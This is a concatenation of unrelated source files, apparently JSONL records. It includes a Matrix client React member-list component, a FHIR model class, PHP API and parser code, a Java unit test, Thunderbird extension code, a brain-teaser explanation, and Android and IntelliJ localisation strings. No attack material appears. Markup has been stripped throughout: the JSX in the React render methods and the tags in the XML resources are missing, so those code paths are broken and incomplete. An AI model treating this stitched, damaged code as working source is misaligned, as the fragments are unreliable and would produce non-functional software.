MatrixClientPeg.get().baseUrl;\n this._showPresence = true;\n if (enablePresenceByHsUrl && enablePresenceByHsUrl[hsUrl] !== undefined) {\n this._showPresence = enablePresenceByHsUrl[hsUrl];\n }\n }\n\n // eslint-disable-next-line camelcase\n UNSAFE_componentWillMount() {\n const cli = MatrixClientPeg.get();\n this._mounted = true;\n if (cli.hasLazyLoadMembersEnabled()) {\n this._showMembersAccordingToMembershipWithLL();\n cli.on(\"Room.myMembership\", this.onMyMembership);\n } else {\n this._listenForMembersChanges();\n }\n }\n\n _listenForMembersChanges() {\n const cli = MatrixClientPeg.get();\n cli.on(\"RoomState.members\", this.onRoomStateMember);\n cli.on(\"RoomMember.name\", this.onRoomMemberName);\n cli.on(\"RoomState.events\", this.onRoomStateEvent);\n // We listen for changes to the lastPresenceTs which is essentially\n // listening for all presence events (we display most of not all of\n // the information contained in presence events).\n cli.on(\"User.lastPresenceTs\", this.onUserPresenceChange);\n cli.on(\"User.presence\", this.onUserPresenceChange);\n cli.on(\"User.currentlyActive\", this.onUserPresenceChange);\n // cli.on(\"Room.timeline\", this.onRoomTimeline);\n }\n\n componentWillUnmount() {\n this._mounted = false;\n const cli = MatrixClientPeg.get();\n if (cli) {\n cli.removeListener(\"RoomState.members\", 
this.onRoomStateMember);\n cli.removeListener(\"RoomMember.name\", this.onRoomMemberName);\n cli.removeListener(\"Room.myMembership\", this.onMyMembership);\n cli.removeListener(\"RoomState.events\", this.onRoomStateEvent);\n cli.removeListener(\"Room\", this.onRoom);\n cli.removeListener(\"User.lastPresenceTs\", this.onUserPresenceChange);\n cli.removeListener(\"User.presence\", this.onUserPresenceChange);\n cli.removeListener(\"User.currentlyActive\", this.onUserPresenceChange);\n }\n\n // cancel any pending calls to the rate_limited_funcs\n this._updateList.cancelPendingCall();\n }\n\n /**\n * If lazy loading is enabled, either:\n * show a spinner and load the members if the user is joined,\n * or show the members available so far if the user is invited\n */\n async _showMembersAccordingToMembershipWithLL() {\n const cli = MatrixClientPeg.get();\n if (cli.hasLazyLoadMembersEnabled()) {\n const cli = MatrixClientPeg.get();\n const room = cli.getRoom(this.props.roomId);\n const membership = room && room.getMyMembership();\n if (membership === \"join\") {\n this.setState({loading: true});\n try {\n await room.loadMembersIfNeeded();\n } catch (ex) {/* already logged in RoomView */}\n if (this._mounted) {\n this.setState(this._getMembersState(this.roomMembers()));\n this._listenForMembersChanges();\n }\n } else if (membership === \"invite\") {\n // show the members we've got when invited\n this.setState(this._getMembersState(this.roomMembers()));\n }\n }\n }\n\n _getMembersState(members) {\n // set the state after determining _showPresence to make sure it's\n // taken into account while rerendering\n return {\n loading: false,\n members: members,\n filteredJoinedMembers: this._filterMembers(members, 'join'),\n filteredInvitedMembers: this._filterMembers(members, 'invite'),\n\n // ideally we'd size this to the page height, but\n // in practice I find that a little constraining\n truncateAtJoined: INITIAL_LOAD_NUM_MEMBERS,\n truncateAtInvited: INITIAL_LOAD_NUM_INVITED,\n searchQuery: \"\",\n };\n }\n\n onUserPresenceChange = (event, user) => {\n // Attach a SINGLE listener for global presence changes then locate the\n // member tile and re-render it. This is more efficient than every tile\n // ever attaching their own listener.\n const tile = this.refs[user.userId];\n // console.log(`Got presence update for ${user.userId}. 
hasTile=${!!tile}`);\n if (tile) {\n this._updateList(); // reorder the membership list\n }\n };\n\n onRoom = room => {\n if (room.roomId !== this.props.roomId) {\n return;\n }\n // We listen for room events because when we accept an invite\n // we need to wait till the room is fully populated with state\n // before refreshing the member list else we get a stale list.\n this._showMembersAccordingToMembershipWithLL();\n };\n\n onMyMembership = (room, membership, oldMembership) => {\n if (room.roomId === this.props.roomId && membership === \"join\") {\n this._showMembersAccordingToMembershipWithLL();\n }\n };\n\n onRoomStateMember = (ev, state, member) => {\n if (member.roomId !== this.props.roomId) {\n return;\n }\n this._updateList();\n };\n\n onRoomMemberName = (ev, member) => {\n if (member.roomId !== this.props.roomId) {\n return;\n }\n this._updateList();\n };\n\n onRoomStateEvent = (event, state) => {\n if (event.getRoomId() === this.props.roomId &&\n event.getType() === \"m.room.third_party_invite\") {\n this._updateList();\n }\n };\n\n _updateList = rate_limited_func(() => {\n this._updateListNow();\n }, 500);\n\n _updateListNow() {\n // console.log(\"Updating memberlist\");\n const newState = {\n loading: false,\n members: this.roomMembers(),\n };\n newState.filteredJoinedMembers = this._filterMembers(newState.members, 'join', this.state.searchQuery);\n newState.filteredInvitedMembers = this._filterMembers(newState.members, 'invite', this.state.searchQuery);\n this.setState(newState);\n }\n\n getMembersWithUser() {\n if (!this.props.roomId) return [];\n const cli = MatrixClientPeg.get();\n const room = cli.getRoom(this.props.roomId);\n if (!room) return [];\n\n const allMembers = Object.values(room.currentState.members);\n\n allMembers.forEach(function(member) {\n // work around a race where you might have a room member object\n // before the user object exists. This may or may not cause\n // https://github.com/vector-im/vector-web/issues/186\n if (member.user === null) {\n member.user = cli.getUser(member.userId);\n }\n\n // XXX: this user may have no lastPresenceTs value!\n // the right solution here is to fix the race rather than leave it as 0\n });\n\n return allMembers;\n }\n\n roomMembers() {\n const allMembers = this.getMembersWithUser();\n const filteredAndSortedMembers = allMembers.filter((m) => {\n return (\n m.membership === 'join' || m.membership === 'invite'\n );\n });\n filteredAndSortedMembers.sort(this.memberSort);\n return filteredAndSortedMembers;\n }\n\n _createOverflowTileJoined = (overflowCount, totalCount) => {\n return this._createOverflowTile(overflowCount, totalCount, this._showMoreJoinedMemberList);\n };\n\n _createOverflowTileInvited = (overflowCount, totalCount) => {\n return this._createOverflowTile(overflowCount, totalCount, this._showMoreInvitedMemberList);\n };\n\n _createOverflowTile = (overflowCount, totalCount, onClick) => {\n // For now we'll pretend this is any entity. 
It should probably be a separate tile.\n const EntityTile = sdk.getComponent(\"rooms.EntityTile\");\n const BaseAvatar = sdk.getComponent(\"avatars.BaseAvatar\");\n const text = _t(\"and %(count)s others...\", { count: overflowCount });\n return (\n \n } name={text} presenceState=\"online\" suppressOnHover={true}\n onClick={onClick} />\n );\n };\n\n _showMoreJoinedMemberList = () => {\n this.setState({\n truncateAtJoined: this.state.truncateAtJoined + SHOW_MORE_INCREMENT,\n });\n };\n\n _showMoreInvitedMemberList = () => {\n this.setState({\n truncateAtInvited: this.state.truncateAtInvited + SHOW_MORE_INCREMENT,\n });\n };\n\n memberString(member) {\n if (!member) {\n return \"(null)\";\n } else {\n const u = member.user;\n return \"(\" + member.name + \", \" + member.powerLevel + \", \" + (u ? u.lastActiveAgo : \"\") + \", \" + (u ? u.getLastActiveTs() : \"\") + \", \" + (u ? u.currentlyActive : \"\") + \", \" + (u ? u.presence : \"\") + \")\";\n }\n }\n\n // returns negative if a comes before b,\n // returns 0 if a and b are equivalent in ordering\n // returns positive if a comes after b.\n memberSort = (memberA, memberB) => {\n // order by presence, with \"active now\" first.\n // ...and then by power level\n // ...and then by last active\n // ...and then alphabetically.\n // We could tiebreak instead by \"last recently spoken in this room\" if we wanted to.\n\n // console.log(`Comparing userA=${this.memberString(memberA)} userB=${this.memberString(memberB)}`);\n\n const userA = memberA.user;\n const userB = memberB.user;\n\n // if (!userA) console.log(\"!! MISSING USER FOR A-SIDE: \" + memberA.name + \" !!\");\n // if (!userB) console.log(\"!! MISSING USER FOR B-SIDE: \" + memberB.name + \" !!\");\n\n if (!userA && !userB) return 0;\n if (userA && !userB) return -1;\n if (!userA && userB) return 1;\n\n // First by presence\n if (this._showPresence) {\n const convertPresence = (p) => p === 'unavailable' ? 'online' : p;\n const presenceIndex = p => {\n const order = ['active', 'online', 'offline'];\n const idx = order.indexOf(convertPresence(p));\n return idx === -1 ? order.length : idx; // unknown states at the end\n };\n\n const idxA = presenceIndex(userA.currentlyActive ? 'active' : userA.presence);\n const idxB = presenceIndex(userB.currentlyActive ? 'active' : userB.presence);\n // console.log(`userA_presenceGroup=${idxA} userB_presenceGroup=${idxB}`);\n if (idxA !== idxB) {\n // console.log(\"Comparing on presence group - returning\");\n return idxA - idxB;\n }\n }\n\n // Second by power level\n if (memberA.powerLevel !== memberB.powerLevel) {\n // console.log(\"Comparing on power level - returning\");\n return memberB.powerLevel - memberA.powerLevel;\n }\n\n // Third by last active\n if (this._showPresence && userA.getLastActiveTs() !== userB.getLastActiveTs()) {\n // console.log(\"Comparing on last active timestamp - returning\");\n return userB.getLastActiveTs() - userA.getLastActiveTs();\n }\n\n // Fourth by name (alphabetical)\n const nameA = (memberA.name[0] === '@' ? memberA.name.substr(1) : memberA.name).replace(SORT_REGEX, \"\");\n const nameB = (memberB.name[0] === '@' ? 
memberB.name.substr(1) : memberB.name).replace(SORT_REGEX, \"\");\n // console.log(`Comparing userA_name=${nameA} against userB_name=${nameB} - returning`);\n return nameA.localeCompare(nameB, {\n ignorePunctuation: true,\n sensitivity: \"base\",\n });\n };\n\n onSearchQueryChanged = searchQuery => {\n this.setState({\n searchQuery,\n filteredJoinedMembers: this._filterMembers(this.state.members, 'join', searchQuery),\n filteredInvitedMembers: this._filterMembers(this.state.members, 'invite', searchQuery),\n });\n };\n\n _onPending3pidInviteClick = inviteEvent => {\n dis.dispatch({\n action: 'view_3pid_invite',\n event: inviteEvent,\n });\n };\n\n _filterMembers(members, membership, query) {\n return members.filter((m) => {\n if (query) {\n query = query.toLowerCase();\n const matchesName = m.name.toLowerCase().indexOf(query) !== -1;\n const matchesId = m.userId.toLowerCase().indexOf(query) !== -1;\n\n if (!matchesName && !matchesId) {\n return false;\n }\n }\n\n return m.membership === membership;\n });\n }\n\n _getPending3PidInvites() {\n // include 3pid invites (m.room.third_party_invite) state events.\n // The HS may have already converted these into m.room.member invites so\n // we shouldn't add them if the 3pid invite state key (token) is in the\n // member invite (content.third_party_invite.signed.token)\n const room = MatrixClientPeg.get().getRoom(this.props.roomId);\n\n if (room) {\n return room.currentState.getStateEvents(\"m.room.third_party_invite\").filter(function(e) {\n if (!isValid3pidInvite(e)) return false;\n\n // discard all invites which have a m.room.member event since we've\n // already added them.\n const memberEvent = room.currentState.getInviteForThreePidToken(e.getStateKey());\n if (memberEvent) return false;\n return true;\n });\n }\n }\n\n _makeMemberTiles(members) {\n const MemberTile = sdk.getComponent(\"rooms.MemberTile\");\n const EntityTile = sdk.getComponent(\"rooms.EntityTile\");\n\n return members.map((m) => {\n if (m.userId) {\n // Is a Matrix invite\n return ;\n } else {\n // Is a 3pid invite\n return this._onPending3pidInviteClick(m)} />;\n }\n });\n }\n\n _getChildrenJoined = (start, end) => this._makeMemberTiles(this.state.filteredJoinedMembers.slice(start, end));\n\n _getChildCountJoined = () => this.state.filteredJoinedMembers.length;\n\n _getChildrenInvited = (start, end) => {\n let targets = this.state.filteredInvitedMembers;\n if (end > this.state.filteredInvitedMembers.length) {\n targets = targets.concat(this._getPending3PidInvites());\n }\n\n return this._makeMemberTiles(targets.slice(start, end));\n };\n\n _getChildCountInvited = () => {\n return this.state.filteredInvitedMembers.length + (this._getPending3PidInvites() || []).length;\n }\n\n render() {\n if (this.state.loading) {\n const Spinner = sdk.getComponent(\"elements.Spinner\");\n return \n \n ;\n }\n\n const SearchBox = sdk.getComponent('structures.SearchBox');\n const TruncatedList = sdk.getComponent(\"elements.TruncatedList\");\n\n const cli = MatrixClientPeg.get();\n const room = cli.getRoom(this.props.roomId);\n let inviteButton;\n\n if (room && room.getMyMembership() === 'join') {\n // assume we can invite until proven false\n let canInvite = true;\n\n const plEvent = room.currentState.getStateEvents(\"m.room.power_levels\", \"\");\n const me = room.getMember(cli.getUserId());\n if (plEvent && me) {\n const content = plEvent.getContent();\n if (content && content.invite > me.powerLevel) {\n canInvite = false;\n }\n }\n\n let inviteButtonText = _t(\"Invite to this room\");\n 
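// If this room is the selected community's general chat (community prototype), the block below relabels the invite button for the community rather than the room.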
const chat = CommunityPrototypeStore.instance.getSelectedCommunityGeneralChat();\n if (chat && chat.roomId === this.props.roomId) {\n inviteButtonText = _t(\"Invite to this community\");\n }\n\n const AccessibleButton = sdk.getComponent(\"elements.AccessibleButton\");\n inviteButton =\n \n { inviteButtonText }\n ;\n }\n\n let invitedHeader;\n let invitedSection;\n if (this._getChildCountInvited() > 0) {\n invitedHeader =

{ _t(\"Invited\") }

;\n invitedSection = ;\n }\n\n const footer = (\n \n );\n\n return \n
\n \n { invitedHeader }\n { invitedSection }\n
\n ;\n }\n\n onInviteButtonClick = () => {\n if (MatrixClientPeg.get().isGuest()) {\n dis.dispatch({action: 'require_registration'});\n return;\n }\n\n // call AddressPickerDialog\n dis.dispatch({\n action: 'view_invite',\n roomId: this.props.roomId,\n });\n };\n}\n"} {"text": "/**\n * @name exports\n * @summary AuditEventObjectDetail Class\n */\nmodule.exports = class AuditEventObjectDetail {\n constructor(opts) {\n // Create an object to store all props\n Object.defineProperty(this, '__data', { value: {} });\n\n // Define getters and setters as enumerable\n\n Object.defineProperty(this, '_id', {\n enumerable: true,\n get: () => this.__data._id,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n let Element = require('./element.js');\n this.__data._id = new Element(value);\n },\n });\n\n Object.defineProperty(this, 'id', {\n enumerable: true,\n get: () => this.__data.id,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n this.__data.id = value;\n },\n });\n\n Object.defineProperty(this, 'extension', {\n enumerable: true,\n get: () => this.__data.extension,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n let Extension = require('./extension.js');\n this.__data.extension = Array.isArray(value)\n ? value.map((v) => new Extension(v))\n : [new Extension(value)];\n },\n });\n\n Object.defineProperty(this, 'modifierExtension', {\n enumerable: true,\n get: () => this.__data.modifierExtension,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n let Extension = require('./extension.js');\n this.__data.modifierExtension = Array.isArray(value)\n ? value.map((v) => new Extension(v))\n : [new Extension(value)];\n },\n });\n\n Object.defineProperty(this, '_type', {\n enumerable: true,\n get: () => this.__data._type,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n let Element = require('./element.js');\n this.__data._type = new Element(value);\n },\n });\n\n Object.defineProperty(this, 'type', {\n enumerable: true,\n get: () => this.__data.type,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n this.__data.type = value;\n },\n });\n\n Object.defineProperty(this, '_value', {\n enumerable: true,\n get: () => this.__data._value,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n let Element = require('./element.js');\n this.__data._value = new Element(value);\n },\n });\n\n Object.defineProperty(this, 'value', {\n enumerable: true,\n get: () => this.__data.value,\n set: (value) => {\n if (value === undefined || value === null) {\n return;\n }\n\n this.__data.value = value;\n },\n });\n\n // Merge in any defaults\n Object.assign(this, opts);\n\n // Define a default non-writable resourceType property\n Object.defineProperty(this, 'resourceType', {\n value: 'AuditEventObjectDetail',\n enumerable: true,\n writable: false,\n });\n }\n\n static get resourceType() {\n return 'AuditEventObjectDetail';\n }\n\n toJSON() {\n return {\n id: this.id,\n extension: this.extension && this.extension.map((v) => v.toJSON()),\n modifierExtension: this.modifierExtension && this.modifierExtension.map((v) => v.toJSON()),\n _type: this._type && this._type.toJSON(),\n type: this.type,\n _value: this._value && this._value.toJSON(),\n value: this.value,\n };\n }\n};\n"} {"text": "getCourseService()->tryTakeCourse($courseId);\n } catch (\\Exception $e) {\n return $this->error(404, 
\"用户尚未登录或不是课程学员\");\n }\n\n $start = $request->query->get('start', 0);\n $limit = $request->query->get('limit', 10);\n\n $statuses = $this->getStatusService()->searchStatuses(\n array('userId' => $member['userId'], 'courseId' => $courseId),\n array('createdTime' => 'DESC'),\n $start,\n $limit\n );\n\n return $this->_filterStatus($statuses);\n }\n\n public function filter($res)\n {\n $res = ArrayToolkit::parts($res, array('id', 'userId', 'courseId', 'classroomId', 'type', 'objectType', 'objectId', 'properties', 'createdTime'));\n\n return $res;\n }\n\n private function _filterStatus(&$res)\n {\n foreach ($res as $key => &$item) {\n unset($item['private']);\n unset($item['commentNum']);\n unset($item['likeNum']);\n }\n\n return $res;\n }\n\n protected function getStatusService()\n {\n return ServiceKernel::instance()->createService('User:StatusService');\n }\n\n protected function getUserService()\n {\n return ServiceKernel::instance()->createService('User:UserService');\n }\n\n protected function getCourseService()\n {\n return $this->getServiceKernel()->createService('Course:CourseService');\n }\n}\n"} {"text": "\n\n\n\n \"Corte largo\"\n\n"} {"text": "/*\n * Copyright © 2019 Cask Data, Inc.\n * \n * Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n * use this file except in compliance with the License. You may obtain a copy of\n * the License at\n * \n * http://www.apache.org/licenses/LICENSE-2.0\n * \n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n * License for the specific language governing permissions and limitations under\n * the License.\n */\n\npackage io.cdap.cdap.metadata.elastic;\n\nimport io.cdap.cdap.api.data.schema.Schema;\nimport io.cdap.cdap.api.metadata.MetadataEntity;\nimport org.junit.Assert;\nimport org.junit.Test;\n\npublic class MetadataDocumentTest {\n\n @Test\n public void testSchema() {\n Schema bytesArraySchema = Schema.arrayOf(Schema.of(Schema.Type.BYTES));\n Schema stringArraySchema = Schema.arrayOf(Schema.of(Schema.Type.STRING));\n Schema booleanBytesMapSchema = Schema.mapOf(Schema.of(Schema.Type.BOOLEAN), Schema.of(Schema.Type.BYTES));\n Schema nestedMapSchema = Schema.mapOf(bytesArraySchema, booleanBytesMapSchema);\n Schema record22Schema = Schema.recordOf(\"record22\", Schema.Field.of(\"a\", nestedMapSchema));\n Schema record22ArraySchema = Schema.arrayOf(record22Schema);\n Schema bytesDoubleMapSchema = Schema.mapOf(Schema.of(Schema.Type.BYTES), Schema.of(Schema.Type.DOUBLE));\n Schema record21Schema = Schema.recordOf(\"record21\",\n Schema.Field.of(\"x\", Schema.of(Schema.Type.STRING)),\n Schema.Field.of(\"y\", stringArraySchema),\n Schema.Field.of(\"z\", bytesDoubleMapSchema));\n Schema record21to22MapSchema = Schema.mapOf(record21Schema, record22ArraySchema);\n Schema nullableIntSchema = Schema.nullableOf(Schema.of(Schema.Type.INT));\n Schema tripeUnionSchema = Schema.unionOf(Schema.of(Schema.Type.INT), Schema.of(Schema.Type.LONG),\n Schema.of(Schema.Type.NULL));\n Schema complexSchema = Schema.recordOf(\"record1\",\n Schema.Field.of(\"map1\", record21to22MapSchema),\n Schema.Field.of(\"i\", nullableIntSchema),\n Schema.Field.of(\"j\", tripeUnionSchema));\n Schema anotherComplexSchema = Schema.arrayOf(Schema.of(Schema.Type.STRING));\n Schema superComplexSchema = Schema.unionOf(complexSchema, anotherComplexSchema, Schema.of(Schema.Type.NULL));\n\n 
String[] results = MetadataDocument.Builder.parseSchema(MetadataEntity.ofDataset(\"ds\"),\n superComplexSchema.toString()).split(\" \");\n String[] expected = {\n \"record1\", \"record1:RECORD\",\n \"map1\", \"map1:MAP\",\n \"record21\", \"record21:RECORD\",\n \"x\", \"x:STRING\",\n \"y\", \"y:ARRAY\",\n \"z\", \"z:MAP\",\n \"record22\", \"record22:RECORD\",\n \"a\", \"a:MAP\",\n \"i\", \"i:INT\",\n \"j\", \"j:UNION\",\n };\n Assert.assertArrayEquals(expected, results);\n }\n\n @Test\n public void testInvalidSchema() {\n Schema schema = Schema.recordOf(\"mystruct\",\n Schema.Field.of(\"x\", Schema.of(Schema.Type.STRING)),\n Schema.Field.of(\"y\", Schema.of(Schema.Type.INT)),\n Schema.Field.of(\"z\", Schema.of(Schema.Type.DOUBLE)));\n String schemaString = schema.toString();\n MetadataEntity entity = MetadataEntity.ofDataset(\"ds\");\n String[] results = MetadataDocument.Builder.parseSchema(entity, schemaString).split(\" \");\n String[] expected = {\"mystruct\", \"mystruct:RECORD\", \"x\", \"x:STRING\", \"y\", \"y:INT\", \"z\", \"z:DOUBLE\"};\n Assert.assertArrayEquals(expected, results);\n\n String schemaWithInvalidTypes = schemaString.replace(\"string\", \"nosuchtype\");\n Assert.assertEquals(schemaWithInvalidTypes, MetadataDocument.Builder.parseSchema(entity, schemaWithInvalidTypes));\n\n String truncatedSchema = schemaString.substring(10, schemaString.length() - 10);\n Assert.assertEquals(truncatedSchema, MetadataDocument.Builder.parseSchema(entity, truncatedSchema));\n }\n}\n"} {"text": "This is a brain teaser kind of problem.\n\nObservation #1, whether #N light stays on depends on how many unique factors N have. Prime numbers must be off, because it is switched on Round 1 and off in Round N.\n\nObservation #2, for a light #N to stays on, N needs to have odd number of factors. Fact: only square numbers can have odd number of unique factors.\n\nProof by contradiction: If a number has odd number of unique factors, and is not a square number, write down all its unique factors, and start crossing off the factors: If I*J=N, cross off J as well as I. In the end, there is only one factor M left, M*M has to be N.\n\n"} {"text": "name = \\is_string($name) ? new Identifier($name) : $name;\n $this->value = $value;\n }\n\n public function getSubNodeNames() : array {\n return ['name', 'value'];\n }\n \n public function getType() : string {\n return 'Const';\n }\n}\n"} {"text": "\n\n\n Görünüm\n Tema, Gösterilecek öğe, vb\n Frekans, filtreler, zilsesi, vb\n Haber akışı\n Haberleşme kısmında hangi öğelerin görüneceğini belirle\n Davranış\n Uygulamanın belirli ayarlarla nasıl etkilesime girdiğini tanımlayın\n \n Ölcülen ağları etkiliyen secenekleri tanımlayın\n Deneysel\n Potansiyel olarak kararsız özelliklere erken erişim sağlamayı etkin kıl\n Frost Hakkında Facebook için\n Versiyon, Crediler, ve SSS\n Çeviri Yardımı\n Frost kalabalıklar içindedir. İsterseniz kendi dilinizde katkı sağlayın!\n Frost Hata ayıklayıcı\n Yardımcı olmak için hataları gönderebilirsiniz.\n Kural tekrarı\n\n"} {"text": "/* This Source Code Form is subject to the terms of the Mozilla Public\n * License, v. 2.0. If a copy of the MPL was not distributed with this\n * file, You can obtain one at https://mozilla.org/MPL/2.0/. 
*/\n\nexport class UIHandler {\n init() {\n browser.commands.onCommand.addListener(this.onKeyCommand.bind(this));\n browser.convContacts.onColumnHandler.addListener(\n () => {},\n browser.i18n.getMessage(\"between.columnName\"),\n browser.i18n.getMessage(\"between.columnTooltip\"),\n browser.i18n.getMessage(\"message.meBetweenMeAndSomeone\"),\n browser.i18n.getMessage(\"message.meBetweenSomeoneAndMe\"),\n browser.i18n.getMessage(\"header.commaSeparator\"),\n browser.i18n.getMessage(\"header.andSeparator\")\n );\n }\n\n onKeyCommand(command) {\n if (command == \"quick_compose\") {\n console.warn(\"Quick Compose is currently disabled\");\n // The title/description for this pref is really confusing, we should\n // reconsider it when we re-enable.\n // if (Prefs.compose_in_tab) {\n // window.openTab(\"chromeTab\", {\n // chromePage:\n // \"chrome://conversations/content/stub.xhtml?quickCompose=1\",\n // });\n // } else {\n // window.open(\n // \"chrome://conversations/content/stub.xhtml?quickCompose=1\",\n // \"\",\n // \"chrome,width=1020,height=600\"\n // );\n // }\n }\n }\n}\n"} {"text": "codeinsight.settings=CodeInsight settings\nerror.hint.file.is.readonly=File {0} is read-only\nerror.dialog.readonly.file.title=File Is Read-Only\nerror.dialog.readonly.files.title=Cannot Modify Read-Only Files\nerror.dialog.readonly.files.message={0} contains read-only file(s).\\nProcess all other (writeable) files?\nprocess.scope.directory=Directory ''{0}''\nprocess.scope.project=Project ''{0}''\nprocess.scope.module=Module ''{0}''\nreformat.code.accept.button.text=Run\nprocess.scope.changed.files=process only VCS changed files\nprocess.scope.file=&File {0}\nreformat.option.selected.text=&Selected text\nreformat.option.all.files.in.directory=&All files in directory {0}\nreformat.option.include.subdirectories=&Include subdirectories\nreformat.option.optimize.imports=&Optimize imports\nreformat.option.rearrange.entries=&Rearrange entries\nreformat.option.vcs.changed.region=Only &VCS changed text\nreformat.progress.file.with.known.name.text=Reformatting {0}\nreformat.and.optimize.progress.common.text=Preparing imports...\nreformat.progress.common.text=Reformatting code...\nprocess.optimize.imports=Optimize Imports\nprocess.optimize.imports.before.commit=Optimize Imports Before Commit\nprogress.text.optimizing.imports=Optimizing imports...\nprogress.reformat.and.optimize.common.command.text=Reformat and Optimize Imports\nprogress.reformat.stage.wrapping.blocks=Preparing...\nprogress.reformat.stage.processing.blocks=Calculating changes...\nprogress.reformat.stage.applying.changes=Storing changes...\nprocess.reformat.code=Reformat Code\nprocess.reformat.code.before.commit=Reformat Code Before Commit\ndialog.reformat.files.title=Reformat Files\ndialog.reformat.files.optimize.imports.checkbox=&Optimize imports\ndialog.reformat.files.reformat.selected.files.label=Reformat selected files?\ncommand.name.typing=Typing\ndialog.import.on.paste.title=Select Classes to Import\ndialog.import.on.paste.title2=Select Elements to Import\ndialog.paste.on.import.text=The code fragment which you have pasted uses classes that are not accessible by imports in the new context.
Select classes that you want to import to the new file.\ndialog.paste.on.import.text2=The code fragment which you have pasted uses elements that are not accessible by imports in the new context.
Select elements that you want to import to the new file.\npaste.data.flavor.folding=FoldingData\npaste.dataflavor.referencedata=ReferenceData\ngenerate.constructor.fields.chooser.title=Choose Fields to Initialize by Constructor\nerror.attempt.to.generate.constructor.for.anonymous.class=Cannot add constructor to an anonymous class\ngenerate.constructor.super.constructor.chooser.title=Choose Super Class Constructor\ngenerate.delegate.method.chooser.title=Select Methods to Generate Delegates for\ngenerate.delegate.target.chooser.title=Select Target to Generate Delegates for\ngenerate.equals.and.hashcode.already.defined.warning=Methods ''boolean equals(Object)'' and ''int hashCode()'' are already defined\\nfor class {0}. Do you want to delete them and proceed?\ngenerate.equals.and.hashcode.already.defined.warning.anonymous=Methods 'boolean equals(Object)' and 'int hashCode()' are already defined\\nfor this anonymous class. Do you want to delete them and proceed?\ngenerate.equals.and.hashcode.already.defined.title=Generate equals() and hashCode()\ngenerate.equals.and.hashcode.error.no.object.class.message=Cannot generate equals() and hashCode().\\nNo java.lang.Object class found.\ngenerate.equals.and.hashcode.error.no.object.class.title=No java.lang.Object\ngenerate.equals.compare.nested.arrays.comment= // Compare nested arrays - values of {0} here\ngenerate.equals.compare.arrays.comment= // Probably incorrect - comparing Object[] arrays with Arrays.equals\ngenerate.getter.setter.title=Select Fields to Generate Getters and Setters\ngenerate.getter.fields.chooser.title=Select Fields to Generate Getters\ngenerate.setter.fields.chooser.title=Select Fields to Generate Setters\noverride.implement.broken.file.template.message=Please Correct \"Overridden/Implemented Method Body\" Template\noverride.implement.broken.file.template.title=File Template Error\nmethods.to.implement.chooser.title=Select Methods to Implement\nmethods.to.override.chooser.title=Select Methods to Override\nmethods.to.override.implement.chooser.title=Select Methods to Override/Implement\ngenerate.list.popup.title=Generate\nsurround.with.cast.template=((Type)expr)\nsurround.with.dowhile.template=do / while\nsurround.with.for.template=for\nsurround.with.ifelse.expression.template=if (expr) {...} else {...}\nsurround.with.ifelse.template=if / else\nsurround.with.if.expression.template=if (expr) {...}\nsurround.with.if.template=if\nsurround.with.not.instanceof.template=!(expr instanceof Type)\nsurround.with.not.template=!(expr)\nsurround.with.parenthesis.template=(expr)\nsurround.with.runnable.template=Runnable\nsurround.with.synchronized.template=synchronized\nsurround.with.try.catch.finally.template=try / catch / finally\nsurround.with.try.catch.template=try / catch\nsurround.with.try.catch.incorrect.template.message=Invalid File Template for Catch Body!\nsurround.with.try.catch.incorrect.template.title=Surround With Try / Catch\nsurround.with.try.finally.template=try / finally\nsurround.with.while.template=while\nsurround.with.runtime.type.template=((RuntimeType)expr)\nsurround.with.chooser.title=Surround With\nunwrap.popup.title=Choose the statement to unwrap/remove\nunwrap.if=Unwrap 'if...'\nunwrap.else=Unwrap 'else...'\nremove.else=Remove 'else...'\nunwrap.while=Unwrap 'while...'\nunwrap.for=Unwrap 'for...'\nunwrap.braces=Unwrap braces\nunwrap.try=Unwrap 'try...'\nunwrap.conditional=Unwrap 'f ? 
a : b'\nremove.catch=Remove 'catch...'\nunwrap.synchronized=Unwrap 'synchronized...'\nunwrap.with.placeholder=Unwrap ''{0}''\nunwrap.anonymous=Unwrap 'anonymous...'\ngenerate.equals.hashcode.wizard.title=Generate equals() and hashCode()\ngenerate.equals.hashcode.equals.fields.chooser.title=Choose &fields to be included in equals()\ngenerate.equals.hashcode.hashcode.fields.chooser.title=Choose &fields to be included in hashCode()\ngenerate.equals.hashcode.non.null.fields.chooser.title=Select all non-null &fields\ngenerate.equals.hashcode.accept.sublcasses=Accept &subclasses as parameter to equals() method\ngenerate.equals.hashcode.accept.sublcasses.explanation=While generally incompliant to Object.equals() specification accepting
subclasses might be necessary for generated \\\nmethod to work correctly
with frameworks, which generate Proxy subclasses like Hibernate.\ngenerate.equals.hashcode.internal.error=Internal error\ngenerate.equals.warning.equals.for.nested.arrays.not.supported=equals() for nested arrays is not supported\ngenerate.equals.warning.generated.equals.could.be.incorrect=Generated equals() for Object[] can be incorrect\ngenerate.equals.hashcode.warning.hashcode.for.arrays.is.not.supported=hashCode () for arrays is not supported\nhighlight.thrown.exceptions.chooser.all.entry=All listed\nhighlight.exceptions.thrown.chooser.title=Choose Exception Classes to Highlight\nhighlight.exceptions.thrown.notfound=No exceptions thrown in the method found \nstatus.bar.exit.points.highlighted.message={0} exit {0, choice, 1#point|2#points} highlighted (press {1} again to remove the highlighting, Escape to remove all highlighting)\nstatus.bar.highlighted.usages.message={0} {0, choice, 1#usage|2#usages} of {1} found (press {2} again to remove the highlighting, Escape to remove all highlighting)\nstatus.bar.highlighted.usages.no.target.message={0} {0, choice, 1#usage|2#usages} found (press {2} again to remove the highlighting, Escape to remove all highlighting)\nstatus.bar.overridden.methods.highlighted.message={0} overridden {0, choice, 1#method|2#methods} found (press {1} again to remove the highlighting, Escape to remove all highlighting)\nstatus.bar.highlighted.usages.not.found.message=No usages of {0} found\nstatus.bar.highlighted.usages.not.found.no.target.message=No usages found\nparameter.info.no.parameters=\nxml.tag.info.no.attributes=\nn.of.m={0} of {1}\nquick.definition.back=Back\nquick.definition.forward=Forward\nquick.definition.edit.source=Edit Source\nquick.definition.show.source=Show 